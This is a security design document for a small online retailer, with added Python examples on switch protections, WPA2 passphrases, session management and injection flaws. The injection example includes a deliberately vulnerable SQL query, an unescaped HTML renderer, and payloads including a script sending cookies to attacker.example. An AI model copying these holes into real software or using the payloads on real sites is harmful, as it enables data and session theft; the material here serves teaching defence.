Security infrastructure design document
This document gives an overview of the security standards and controls the company will
adopt to meet its business goals and its legal and contractual obligations.
Premises:
- the company is a small but growing organization with 50 employees in one small office;
- the company is an online retailer of the world's finest artisanal, hand-crafted widgets.
Requirements:
1) An external website permitting users to browse and purchase widgets
2) An internal intranet website for employees to use
3) Secure remote access for engineering employees
4) Reasonable, basic firewall rules
5) Wireless coverage in the office
6) Reasonably secure configurations for laptops
First, we will implement a firewall, or verify that the firewall the company already has is
a capable enterprise firewall running the latest patched firmware. Then we will configure
the basic firewall rules. Because we are starting from scratch, we apply the concept of
implicit deny: the default rule denies all traffic, and as we bring up the external website,
the internal intranet, the VPN and so on, we add a rule that explicitly allows each of
them, as narrowly as possible (source, destination and port). Implicit deny means that any
traffic not explicitly permitted is denied, so a new service is unreachable until someone
consciously opens it, and the rule set doubles as an inventory of what is exposed.

We will also deploy, if the company does not already have them, enterprise switches that
support DHCP snooping. The switch inspects DHCP traffic, discards DHCP server replies
(OFFER/ACK) that arrive on untrusted access ports, which blocks rogue DHCP servers, and
records every lease it sees in a binding table of IP address, MAC address, VLAN and switch
port. Two further features use that table: IP Source Guard drops IP packets whose source
address does not match the binding for the port they arrived on, which stops IP spoofing
(faking a source IP address for deceptive purposes), and DAI (Dynamic ARP Inspection)
drops ARP messages whose sender IP/MAC pair does not match a binding, which stops ARP
poisoning (forging ARP replies so that a host sends its traffic to the attacker, typically
by claiming the gateway's address). Hosts with static addresses need static entries in the
binding table or they will be blocked. Furthermore, we will use an IDS/IPS (intrusion
detection system and intrusion prevention system) to monitor and analyze network traffic:
the IDS raises alerts on suspicious traffic, and the IPS sits inline and can block it.
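The following is an added example, not part of the design document and not any switch vendor's code: a small Python model of how DHCP snooping, IP Source Guard and Dynamic ARP Inspection cooperate. The binding table is built from DHCP exchanges, server replies on untrusted ports are dropped, and IP and ARP traffic on access ports is checked against the table. The port names, MAC addresses, VLAN and traffic in `run_demo` are constructed for the illustration.

```python
"""Added example, not part of the design document: a small model of how
DHCP snooping, IP Source Guard and Dynamic ARP Inspection work together
on an access switch.  Port names, MAC addresses and the traffic below are
constructed for illustration and do not follow any vendor's CLI."""
from dataclasses import dataclass, field


@dataclass
class Binding:
    """One entry of the DHCP snooping binding table."""
    mac: str
    ip: str
    port: str
    vlan: int


@dataclass
class Switch:
    trusted_ports: set = field(default_factory=set)    # uplinks toward the real DHCP server
    bindings: dict = field(default_factory=dict)       # (vlan, mac) -> Binding
    client_ports: dict = field(default_factory=dict)   # (vlan, mac) -> port that sent DISCOVER/REQUEST
    log: list = field(default_factory=list)

    def dhcp(self, port, vlan, msg):
        """DHCP snooping: learn leases, and drop server replies from untrusted ports."""
        key = (vlan, msg["client_mac"])
        if msg["type"] in ("DISCOVER", "REQUEST"):
            self.client_ports[key] = port          # remember which access port the client is on
            return "forward"
        # OFFER and ACK come from a DHCP server; only trusted ports may carry them
        if port not in self.trusted_ports:
            self.log.append(f"DROP DHCP {msg['type']} from untrusted {port}: rogue DHCP server")
            return "drop"
        if msg["type"] == "ACK" and key in self.client_ports:
            b = Binding(msg["client_mac"], msg["yiaddr"], self.client_ports[key], vlan)
            self.bindings[key] = b
            self.log.append(f"BIND {b.ip} -> {b.mac} on {b.port} vlan {b.vlan}")
        return "forward"

    def _matches(self, port, vlan, mac, ip):
        b = self.bindings.get((vlan, mac))
        return b is not None and b.ip == ip and b.port == port

    def ip_packet(self, port, vlan, src_mac, src_ip):
        """IP Source Guard: the source address must match the binding for this port."""
        if port in self.trusted_ports or self._matches(port, vlan, src_mac, src_ip):
            return "forward"
        self.log.append(f"DROP IP src {src_ip} ({src_mac}) on {port}: no binding, IP spoofing")
        return "drop"

    def arp(self, port, vlan, sender_mac, sender_ip):
        """Dynamic ARP Inspection: the sender IP/MAC pair must match the binding for this port."""
        if port in self.trusted_ports or self._matches(port, vlan, sender_mac, sender_ip):
            return "forward"
        self.log.append(f"DROP ARP {sender_ip} is-at {sender_mac} on {port}: binding mismatch, ARP poisoning")
        return "drop"


def run_demo():
    """Constructed scenario: host A (Gi1/0/1) and host B (Gi1/0/2) both get leases,
    then B tries a rogue DHCP server, IP spoofing and ARP poisoning."""
    sw = Switch(trusted_ports={"Gi1/0/24"})
    vlan, a_mac, b_mac, uplink = 10, "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02", "Gi1/0/24"
    decisions = [
        sw.dhcp("Gi1/0/1", vlan, {"type": "DISCOVER", "client_mac": a_mac}),
        sw.dhcp(uplink, vlan, {"type": "ACK", "client_mac": a_mac, "yiaddr": "10.0.10.50"}),
        sw.dhcp("Gi1/0/2", vlan, {"type": "DISCOVER", "client_mac": b_mac}),
        sw.dhcp(uplink, vlan, {"type": "ACK", "client_mac": b_mac, "yiaddr": "10.0.10.51"}),
        # B answers A's next DISCOVER with its own OFFER (rogue DHCP server)
        sw.dhcp("Gi1/0/2", vlan, {"type": "OFFER", "client_mac": a_mac, "yiaddr": "10.0.10.66"}),
        # A sends normal traffic from its leased address
        sw.ip_packet("Gi1/0/1", vlan, a_mac, "10.0.10.50"),
        # B sends a packet pretending to be A (IP spoofing)
        sw.ip_packet("Gi1/0/2", vlan, b_mac, "10.0.10.50"),
        # B claims the gateway's address in an ARP reply (ARP poisoning)
        sw.arp("Gi1/0/2", vlan, b_mac, "10.0.10.1"),
        # A's own ARP reply is consistent with its binding
        sw.arp("Gi1/0/1", vlan, a_mac, "10.0.10.50"),
    ]
    return decisions, sw.log


if __name__ == "__main__":
    decisions, log = run_demo()
    print(decisions)
    print("\n".join(log))
```

The model also shows the operational caveat: a host that never obtained a lease (a printer or server with a static address) has no binding and is dropped by both checks, so on real switches such hosts need static binding entries or their ports need to be marked trusted deliberately.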
Second, we will set up the internal network and the intranet website for employees. We
will use VLANs (Virtual Local Area Networks) to split the office into separate network
segments (for example servers, employee workstations, Wi-Fi and guests), so that traffic
between segments must pass the firewall rules; the guest network in particular will be
isolated from the internal network so that a compromised guest device cannot reach
internal systems. We will use Windows Active Directory for authentication on the internal
network, with Kerberos issuing tickets that grant access to the permitted services and
software. Signing in to an internal machine will also require a YubiKey: the user must
physically touch the key, so access needs both the password and the hardware token,
giving a proper multi-factor authentication setup. Through Active Directory organizational
units and security groups we will grant each team access only to the folders and
databases its work requires, following least privilege. This also helps us monitor,
protect and account for access to sensitive customer data. All laptops, whether used
inside or outside the office, must have a TPM (Trusted Platform Module), a hardware chip
that stores cryptographic keys rather than leaving them on the disk, and all laptops will
use FDE (full disk encryption) with the key protected by the TPM, so that the data is
unreadable if the device is lost or stolen. Remote employees will reach the intranet and
internal storage through a VPN using L2TP over IPsec, where IPsec provides the
authentication and encryption of the tunnel; the VPN will require the same multi-factor
authentication as a local sign-in.
Remote access will be granted only to the Engineering Organizational Unit (OU). Their
laptops will have a special configuration and policies, and all internal PCs will share
the same baseline:
- Strong passwords and multi-factor authentication
- FDE
- Enforced regular software updates and security patches
- Anti-virus, updated regularly
- Host firewall (it is recommended to run both a host firewall and the network firewall)
- VPN client configured and the VPN service allowed only on the remote-access laptops;
other PCs get neither
- All unnecessary ports and services disabled
- Laptops and mobile devices used to connect to the company will have remote wipe and
location tracking enabled
- Enforced regular data backups
Mobile devices will be enrolled in MDM (Mobile Device Management) / EMM (Enterprise
Mobility Management) so that the company can manage them remotely: enforce the policies
above, push updates and wipe a lost device.
Security and privacy training, with courses and quizzes, will be given to employees once a
year. Employees will be trained on the overall security and privacy policies, such as data
classification and incident response procedures. For example, they will be trained to
recognize phishing emails and other malware threats, to apply software updates promptly,
to use strong passwords, and to know whom to report a suspected incident to.
In the office there will be several APs (access points) to provide Wi-Fi coverage. WPS
will be disabled, since its PIN can be brute-forced. The APs will use WPA2 with AES (CCMP)
encryption and a strong, long pre-shared key; WEP and TKIP will not be enabled. Because a
pre-shared key is shared by everyone who uses it, it must be changed whenever an employee
leaves; a stronger option that fits the Active Directory setup is WPA2-Enterprise
(802.1X), which gives each employee individual credentials. Guests will get their own SSID
mapped to the isolated guest VLAN.
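The following is an added example, not part of the design document, showing why the pre-shared key must be strong: WPA2-Personal derives the 256-bit PSK from the passphrase and SSID with PBKDF2, and anyone who captures a client's four-way handshake can try passphrases offline at that cost per guess. The SSID, the passphrases in the demo and the guess rate passed to `guess_time_years` are assumptions; the PSK derivation itself is the standard one and is checked against the published 802.11i test vector.

```python
"""Added example, not part of the design document: how WPA2-Personal turns
the Wi-Fi passphrase into the 256-bit pre-shared key, and a generator for a
passphrase strong enough to resist offline guessing.  Standard library only;
the SSID and passphrases used in the demo are made up."""
import hashlib
import math
import secrets
import string


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes),
    the mapping defined for WPA2-Personal in IEEE 802.11i.  The passphrase
    must be 8 to 63 printable ASCII characters."""
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii() or not passphrase.isprintable():
        raise ValueError("WPA2 passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def passphrase_entropy_bits(passphrase: str) -> float:
    """Upper-bound entropy estimate: length times log2 of the size of the
    character classes used.  A dictionary word scores far lower in practice."""
    pool = 0
    if any(c.islower() for c in passphrase):
        pool += 26
    if any(c.isupper() for c in passphrase):
        pool += 26
    if any(c.isdigit() for c in passphrase):
        pool += 10
    if any(c in string.punctuation for c in passphrase):
        pool += len(string.punctuation)
    return len(passphrase) * math.log2(pool) if pool else 0.0


def generate_passphrase(length: int = 24) -> str:
    """Random passphrase from the OS CSPRNG; 24 characters of this 94-symbol
    alphabet give about 157 bits, far beyond what offline cracking can search."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


def guess_time_years(bits: float, guesses_per_second: float) -> float:
    """Expected time to hit a passphrase of the given entropy by brute force.
    The guess rate is an assumption supplied by the caller; each guess costs
    one 4096-iteration PBKDF2 run, which is what makes WPA2 cracking slow."""
    return (2 ** bits / 2) / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    # Published test vector from IEEE 802.11i: passphrase "password", SSID "IEEE"
    print(wpa2_psk("password", "IEEE").hex())
    weak, strong = "password", generate_passphrase()
    rate = 500_000  # assumed offline guess rate, guesses per second
    for p in (weak, strong):
        bits = passphrase_entropy_bits(p)
        print(f"{p!r}: ~{bits:.0f} bits, ~{guess_time_years(bits, rate):.3g} years at {rate}/s")
```

Two things the code makes visible: the SSID is the salt, so a PSK precomputed for one network name is useless against another (which is also why a default SSID such as the vendor's name is worth changing), and entropy, not the 256-bit output size, is what the attacker's search space depends on.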
The company will have a NAS (Network Attached Storage) to regularly back up the internal
databases, the internal website and the external website, in practice all data on the
servers. Backups will be tested by periodically restoring from them, and the backup target
will not be writable with ordinary user credentials, so that ransomware on a workstation
cannot encrypt the backups along with the data. The servers will enforce policies on which
applications may run, and Microsoft 365 Defender will be deployed on the servers and on
the endpoints.
The internal website will implement RBAC (role-based access control) to assign permissions
and limit access based on job roles and responsibilities, with roles mapped to the Active
Directory groups described above. Communication between the employees' browsers and the
internal website will be encrypted with HTTPS, which prevents interception of credentials
and data on the network. Furthermore, session management (server-side sessions with
unguessable identifiers, idle and absolute timeouts, and a new session identifier issued
at login), logging and monitoring will be implemented.
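The following is an added example, not part of the design document and not the intranet's actual code: a server-side session store with the properties a secure intranet needs (unguessable tokens, a fresh token at login so a pre-authentication session id cannot be fixated on the victim, idle and absolute timeouts) and a role-based authorization check that denies anything not explicitly granted. The role names, permissions and timeout values are assumptions; the clock is injectable so that expiry can be exercised without waiting.

```python
"""Added example, not part of the design document: server-side session
management with login rotation and timeouts, plus a deny-by-default RBAC
check, as an intranet web application would implement them.  Roles,
permissions and timeouts are assumed values for the illustration."""
import secrets
import time
from dataclasses import dataclass

IDLE_TIMEOUT = 15 * 60          # assumed policy: log out after 15 minutes of inactivity
ABSOLUTE_TIMEOUT = 8 * 60 * 60  # and unconditionally 8 hours after login

# Role -> permissions.  Roles correspond to AD security groups; a permission
# not listed for any of the user's roles is denied.
ROLE_PERMISSIONS = {
    "engineering": {"read:wiki", "write:wiki", "read:deploy-logs"},
    "sales": {"read:wiki", "read:customers"},
    "hr": {"read:wiki", "read:employees", "write:employees"},
}


class AuthError(Exception):
    pass


@dataclass
class Session:
    user: str
    roles: frozenset
    created: float
    last_seen: float


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}

    def login(self, user, roles, pre_auth_token=None):
        """Issue a fresh token at login.  Any token the browser held before
        authenticating is discarded, so a session id planted by an attacker
        (session fixation) never becomes an authenticated session."""
        if pre_auth_token is not None:
            self._sessions.pop(pre_auth_token, None)
        now = self._clock()
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, unguessable
        self._sessions[token] = Session(user, frozenset(roles), now, now)
        return token

    def resolve(self, token):
        """Return the live session for a token, enforcing both timeouts."""
        s = self._sessions.get(token)
        if s is None:
            raise AuthError("unknown session")
        now = self._clock()
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_TIMEOUT:
            del self._sessions[token]
            raise AuthError("session expired")
        s.last_seen = now
        return s

    def is_valid(self, token):
        try:
            self.resolve(token)
            return True
        except AuthError:
            return False

    def logout(self, token):
        self._sessions.pop(token, None)


def authorize(session, permission):
    """Deny unless at least one of the user's roles grants the permission."""
    granted = set().union(*(ROLE_PERMISSIONS.get(r, set()) for r in session.roles))
    return permission in granted


def demo():
    """Constructed scenario exercising fixation, RBAC and both timeouts."""
    now = [1_700_000_000.0]                      # fake clock so expiry is testable instantly
    store = SessionStore(clock=lambda: now[0])
    out = {}
    # A session that existed before authentication, e.g. a cookie an attacker
    # planted in the victim's browser.  Login must not keep using it.
    pre_auth = store.login("anonymous", [])
    token = store.login("alice", ["engineering"], pre_auth_token=pre_auth)
    out["old_token_rejected"] = not store.is_valid(pre_auth)
    session = store.resolve(token)
    out["can_write_wiki"] = authorize(session, "write:wiki")
    out["can_read_employees"] = authorize(session, "read:employees")
    now[0] += IDLE_TIMEOUT + 1                   # alice walks away for over 15 minutes
    out["idle_expired"] = not store.is_valid(token)
    token2 = store.login("bob", ["sales"])
    for _ in range(49):                          # 49 x 10 minutes = 8h10m of steady activity
        now[0] += 10 * 60
        store.is_valid(token2)                   # refreshes last_seen, not the creation time
    out["absolute_expired"] = not store.is_valid(token2)
    return out


if __name__ == "__main__":
    print(demo())
```

The token would be sent to the browser in a cookie flagged Secure, HttpOnly and SameSite so that it only travels over HTTPS and is not readable by script; the cookie itself carries no data, everything lives server-side in the store.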
The external website will have a stronger implementation:
- Access control with multi-factor authentication
- Secure coding practices, in particular parameterized queries and output encoding, which
prevent common attacks such as SQL injection and XSS (cross-site scripting)
- The least privilege principle, so that the web application's database account can only
read and write the tables it needs and a successful injection does less damage
- Regular vulnerability scanning with dedicated tools
- A WAF (Web Application Firewall), which adds a layer of protection and helps mitigate
DDoS attacks, injection attempts and malicious file uploads; it complements secure coding
rather than replacing it
- TLS must be used to encrypt communication between the user and the website: a TLS
certificate from a trusted CA installed to enable HTTPS, with plain HTTP redirected to
HTTPS
- A Content Security Policy header to restrict where scripts may be loaded from
- Regular patch management to update the platform, its components and plugins
- Regular security audits and penetration tests (these will also cover the entire internal
network and the endpoint devices)
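The following is an added example, not part of the design document and not the shop's actual code: the two injection bugs named in the list, each beside its fix, and the Content Security Policy header as a second layer of defence. The in-memory SQLite catalogue, the widget names and the attacker payloads are constructed for the demonstration.

```python
"""Added example, not part of the design document: SQL injection and XSS in
a catalogue search, each beside its fix, plus the response headers that
limit the damage when a bug slips through.  The SQLite table, widget names
and attacker payloads are constructed for the demonstration."""
import html
import sqlite3


def make_db():
    """Constructed catalogue: two published widgets and one that must stay hidden."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE widgets (id INTEGER PRIMARY KEY, name TEXT, price REAL, published INTEGER)")
    db.executemany(
        "INSERT INTO widgets (name, price, published) VALUES (?, ?, ?)",
        [("Brass Gear", 12.5, 1), ("Copper Sprocket", 19.0, 1), ("Unreleased Prototype", 999.0, 0)],
    )
    return db


def search_vulnerable(db, term):
    """String concatenation: the user's input becomes part of the SQL statement."""
    sql = "SELECT name FROM widgets WHERE published = 1 AND name LIKE '%" + term + "%'"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, term):
    """Parameterised query: the input is bound as a value and cannot alter the statement."""
    sql = "SELECT name FROM widgets WHERE published = 1 AND name LIKE ?"
    return [row[0] for row in db.execute(sql, ("%" + term + "%",))]


def render_vulnerable(term, results):
    """Reflects untrusted strings into HTML unescaped: reflected or stored XSS."""
    items = "".join("<li>" + r + "</li>" for r in results)
    return "<p>Results for " + term + "</p><ul>" + items + "</ul>"


def render_safe(term, results):
    """Output encoding: every untrusted string is HTML-escaped before it is emitted."""
    items = "".join("<li>" + html.escape(r) + "</li>" for r in results)
    return "<p>Results for " + html.escape(term) + "</p><ul>" + items + "</ul>"


def security_headers():
    """Headers the site should send on every response.  The CSP forbids inline
    scripts and scripts from other origins, so an XSS that slips past output
    encoding still cannot run; HSTS keeps returning browsers on HTTPS."""
    return {
        "Content-Security-Policy": "default-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "X-Content-Type-Options": "nosniff",
    }


# Constructed attacker inputs
SQLI_PAYLOAD = "' OR 1=1 --"
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, SQLI_PAYLOAD))   # leaks the unpublished row
    print("safe:      ", search_safe(db, SQLI_PAYLOAD))         # nothing matches the literal text
    print(render_safe(XSS_PAYLOAD, search_safe(db, "gear")))
```

The concatenated query turns the payload into `... AND name LIKE '%' OR 1=1 --%'`, so the `published = 1` filter is bypassed and the hidden row leaks; the parameterised version searches for the literal text and returns nothing. The least privilege item of the list is what bounds the damage if such a bug ships anyway: a database account that can only SELECT from the catalogue cannot be used to alter orders or read payment data.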
As the company will handle customer credit card payments, PCI DSS (Payment Card Industry
Data Security Standard) must be followed; it is a contractual requirement imposed by the
card brands and the acquiring bank, and non-compliance can mean fines or losing the ability
to accept card payments. Many of its requirements are already covered by the
implementation described so far. Other steps that must be taken include:
- Assign a unique ID to each person with computer access
- Restrict physical access to cardholder data
- Do not use vendor-supplied default passwords or security parameters
This document is a summary of the implementation that will be done and is not exhaustive.
Further work will emerge while the measures above are being integrated, and the plan will
be revised as new technologies become available and existing ones are deployed.